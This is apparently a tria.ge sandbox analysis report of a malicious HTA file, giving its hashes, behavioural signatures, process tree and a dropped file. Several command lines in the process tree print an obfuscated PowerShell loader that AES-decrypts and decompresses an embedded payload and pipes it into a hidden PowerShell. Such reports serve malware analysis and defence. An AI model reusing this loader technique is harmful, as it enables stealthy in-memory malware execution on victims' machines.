Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel: 118s
max time network: 119s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 14/06/2024, 14:02
Static task: static1
Behavioral task: behavioral1
  Sample: opituvannya.hta
  Resource: win7-20240221-en
Behavioral task: behavioral2
  Sample: opituvannya.hta
  Resource: win10v2004-20240611-en
General
Target: opituvannya.hta
Size: 62KB
MD5: c708f14c2f52a4dc08397830f236756c
SHA1: 4ac6a85dd75482792aaf1bd5926f0fadb3294076
SHA256: 82f62251ab3149595cbbb8650c9751965643deb0b94bf072378d2995b578d67e
SHA512: 46c4826e3f06ed0e40f41a9d1ea7f9c355141cf8574f5f7742b47694aa7b9815b1019a952f2be196ee365f89ae2c367c719c680509c74e281d903be63d046a6c
SSDEEP: 768:knAQQXYSMpqVHKkwIMU+B8sbo11HKZOzfUwM:eAQiYSMpmqk6pBW11HNMwM
Malware Config
Signatures
Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
  Runs PowerShell and hides the display window.
  pid   Process
  2592  powershell.exe
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
Modifies Internet Explorer settings
  description  ioc                                                                                                       Process
  Key created  \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe
Suspicious behavior: EnumeratesProcesses (5 IoCs)
  pid   Process
  2592  powershell.exe
  2592  powershell.exe
  2592  powershell.exe
  2648  powershell.exe
  2476  powershell.exe
Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description               pid   Process
  Token: SeDebugPrivilege   2592  powershell.exe
  Token: SeDebugPrivilege   2648  powershell.exe
  Token: SeDebugPrivilege   2476  powershell.exe
Suspicious use of WriteProcessMemory (16 IoCs; each row below was recorded 4 times)
  description                          pid   Process         procid_target
  PID 2188 wrote to memory of 2592     2188  mshta.exe       28
  PID 2592 wrote to memory of 3060     2592  powershell.exe  30
  PID 3060 wrote to memory of 2648     3060  cmd.exe         32
  PID 3060 wrote to memory of 2476     3060  cmd.exe         33
Processes (process tree; indentation shows parent/child depth)
C:\Windows\SysWOW64\mshta.exe
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\opituvannya.hta"
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  PID: 2188
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $OrYH = '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';$dHtuiS = 'b0tpdml0akhVWVZmZUpqSHhkTkFFYlFuS3NsVUV5eko=';$FJnOHKSp = New-Object 'System.Security.Cryptography.AesManaged';$FJnOHKSp.Mode = [System.Security.Cryptography.CipherMode]::ECB;$FJnOHKSp.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$FJnOHKSp.BlockSize = 128;$FJnOHKSp.KeySize = 256;$FJnOHKSp.Key = [System.Convert]::FromBase64String($dHtuiS);$KwgMm = [System.Convert]::FromBase64String($OrYH);$JYOJxPKu = $KwgMm[0..15];$FJnOHKSp.IV = $JYOJxPKu;$HvplKVDJO = $FJnOHKSp.CreateDecryptor();$PKmDucvUS = $HvplKVDJO.TransformFinalBlock($KwgMm, 16, $KwgMm.Length - 16);$FJnOHKSp.Dispose();$nXEtI = New-Object System.IO.MemoryStream( , $PKmDucvUS );$xiAyE = New-Object System.IO.MemoryStream;$GyoHARsHW = New-Object System.IO.Compression.GzipStream $nXEtI, ([IO.Compression.CompressionMode]::Decompress);$GyoHARsHW.CopyTo( $xiAyE );$GyoHARsHW.Close();$nXEtI.Close();[byte[]] $xHkGdAr = $xiAyE.ToArray();$AgmPvTp = [System.Text.Encoding]::UTF8.GetString($xHkGdAr);$AgmPvTp | powershell - }
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 2592
        C:\Windows\SysWOW64\cmd.exe
          Command line: "C:\Windows\system32\cmd.exe" /c powershell.exe $OrYH = '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';$dHtuiS = 'b0tpdml0akhVWVZmZUpqSHhkTkFFYlFuS3NsVUV5eko=';$FJnOHKSp = New-Object 'System.Security.Cryptography.AesManaged';$FJnOHKSp.Mode = [System.Security.Cryptography.CipherMode]::ECB;$FJnOHKSp.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$FJnOHKSp.BlockSize = 128;$FJnOHKSp.KeySize = 256;$FJnOHKSp.Key = [System.Convert]::FromBase64String($dHtuiS);$KwgMm = [System.Convert]::FromBase64String($OrYH);$JYOJxPKu = $KwgMm[0..15];$FJnOHKSp.IV = $JYOJxPKu;$HvplKVDJO = $FJnOHKSp.CreateDecryptor();$PKmDucvUS = $HvplKVDJO.TransformFinalBlock($KwgMm, 16, $KwgMm.Length - 16);$FJnOHKSp.Dispose();$nXEtI = New-Object System.IO.MemoryStream( , $PKmDucvUS );$xiAyE = New-Object System.IO.MemoryStream;$GyoHARsHW = New-Object System.IO.Compression.GzipStream $nXEtI, ([IO.Compression.CompressionMode]::Decompress);$GyoHARsHW.CopyTo( $xiAyE );$GyoHARsHW.Close();$nXEtI.Close();[byte[]] $xHkGdAr = $xiAyE.ToArray();$AgmPvTp = [System.Text.Encoding]::UTF8.GetString($xHkGdAr);$AgmPvTp | powershell -
          - Suspicious use of WriteProcessMemory
          PID: 3060
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Command line: powershell.exe $OrYH = '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';$dHtuiS = 'b0tpdml0akhVWVZmZUpqSHhkTkFFYlFuS3NsVUV5eko=';$FJnOHKSp = New-Object 'System.Security.Cryptography.AesManaged';$FJnOHKSp.Mode = [System.Security.Cryptography.CipherMode]::ECB;$FJnOHKSp.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$FJnOHKSp.BlockSize = 128;$FJnOHKSp.KeySize = 256;$FJnOHKSp.Key = [System.Convert]::FromBase64String($dHtuiS);$KwgMm = [System.Convert]::FromBase64String($OrYH);$JYOJxPKu = $KwgMm[0..15];$FJnOHKSp.IV = $JYOJxPKu;$HvplKVDJO = $FJnOHKSp.CreateDecryptor();$PKmDucvUS = $HvplKVDJO.TransformFinalBlock($KwgMm, 16, $KwgMm.Length - 16);$FJnOHKSp.Dispose();$nXEtI = New-Object System.IO.MemoryStream( , $PKmDucvUS );$xiAyE = New-Object System.IO.MemoryStream;$GyoHARsHW = New-Object System.IO.Compression.GzipStream $nXEtI, ([IO.Compression.CompressionMode]::Decompress);$GyoHARsHW.CopyTo( $xiAyE );$GyoHARsHW.Close();$nXEtI.Close();[byte[]] $xHkGdAr = $xiAyE.ToArray();$AgmPvTp = [System.Text.Encoding]::UTF8.GetString($xHkGdAr);$AgmPvTp
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
              PID: 2648
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Command line: powershell -
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
              PID: 2476
Network
MITRE ATT&CK Enterprise v15
Downloads
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Filesize: 7KB
  MD5: 6b0531ba3462460fd0b88c33e6f11d6d
  SHA1: bdd2835eb040927a5320a2fa998a3aa4a5ef9d01
  SHA256: 53ec09c0f03b2bba78ae154029cf9c2db4b070af114c129c336171fcca6d65b2
  SHA512: 96faafd1bbaa9535b14962e87e78db1e770ec7b69847aaf0cfca903c286f3016b2667cc4577f0603bbdd787c82dedb330bc6cb6018c30b1b5f85046649e79d3f